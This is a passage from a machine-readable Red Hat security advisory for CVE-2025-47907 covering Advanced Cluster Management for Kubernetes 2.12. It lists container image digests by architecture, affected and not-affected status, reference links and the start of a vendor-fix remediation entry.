"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:07:27+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
